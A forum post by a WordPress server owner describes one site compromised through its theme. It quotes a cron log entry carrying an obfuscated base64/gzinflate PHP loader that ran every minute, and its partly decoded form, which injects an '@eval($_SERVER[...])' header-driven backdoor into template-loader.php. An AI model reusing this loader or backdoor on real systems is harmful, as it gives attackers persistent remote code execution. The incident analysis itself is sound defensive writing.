I have/had a server running numerous WordPress sites. The only one that’s ever given me problems is the one running this theme…mostly in the form of unsolicied posts getting put in to my database.
No other site running any other theme was affected. Ever. SQL server can only be accessed via local connections. If someone had exploited somehow and gotten real access to the databases; they’d likely have gone after the other sites. So whatever happened was pretty much sandboxed to a single site.
Then there’s this:
Aug 17 07:50:01 pickmy CRON[87091]: (www-data) CMD (/usr/bin/php -r ‘eval(gzinflate(base64_decode(“jZFtb9owEMffI/EdXClSg0BTAhUMTbzYKE8pEJ7K0zRFieM0BseOYoeUTPvucyAUulXaLFs+ne9+d/d3sRD6YZtRb2kT7NoCqfebBdNMKkJz97UBU6aNFwwPa1sf4mbNrcGDQzua227WYFsPnWDM3dWMwGNT2670xOl1te1c5061u9+uBzHs+clgl7E6Gatm4kFiPhuPs9309ewfZP50tGN42ltWN6uEGd3mYrY0VvI4huY/L7vfvNEjaU+1jTaau+7TgmOzuq+PUpGau5FuYqO8Jq/pU0CCIQ5DqDePTtU4uP2xI/0Nr5vU13PO1n3x2cSk7MwHDW/aat2XvhQLXkyhwIyCP2VQOIpK4GexUCwAuQjmAqiKFxMysYVfAQo/coGCDj1IGzIXySu0hUARLYEWiKnMxxKWItWxOao/WC7Kws7grHSGVTiLI4hkgocJsl6QsCCjAlHBr8UuwdgDKheR3Gqed9tGCdy1JMYmHJ36BvmKkIgjmiN+XUl3YYRerMAW0FcvnVfAFXx6Qbz0T5hCUTK/jCGbsyIUEhvKSXPEd+1HrhH4BCb9idUxh9J6/3yu+9Gob/j307b+e1ol0zYQOLjofLJv9AVloGt5TkwJpvu/xT/9Txh/9D+VGwku4YLFma43IW+FsxDZ2W8=”)));’^M)
Okay…note to self…check cron logs more than every two years because something like this uses so little CPU you’ll never see it; but it was running EVERY SINGLE MINUTE. So I got to working on this and saving one level of obfuscated code…I see this:
a:4:{i:0;s:45:"/var/www/nq4t/wp-includes/template-loader.php";i:1;s:7:"09BCF41";i:2;s:32:"@eval($_SERVER['HTTP_09BCF41']);";i:3;s:35:"~^\s*if.*is_robots[^\{|\:]+(\{|:)~m";}
Okay……at this point I looked back at my day one backups and saw that @eval line in template-loader.php. So I figure it’s something to make sure that line is in the file. What for…I don’t know. The only thing I do know is after an extensive search for every bit of the decoded function; I only found two other results cached from websites that decrypt obfuscated PHP code…anything that was really nasty would have likely been written about over the last two years. Right now I’m more worried about how wordpress was able to insert a cronjob for a user with no shell. In fact I’m ditching WordPress entirely. I used to think it was possible to run one secure; but clearly it’s not.
But either there was something I classify as “sloppy funny business”…or this thing got exploited the first 15 minutes of being up. Hackers are quick, but not that quick.
-
This reply was modified 2 years, 7 months ago by
KM4JOJ.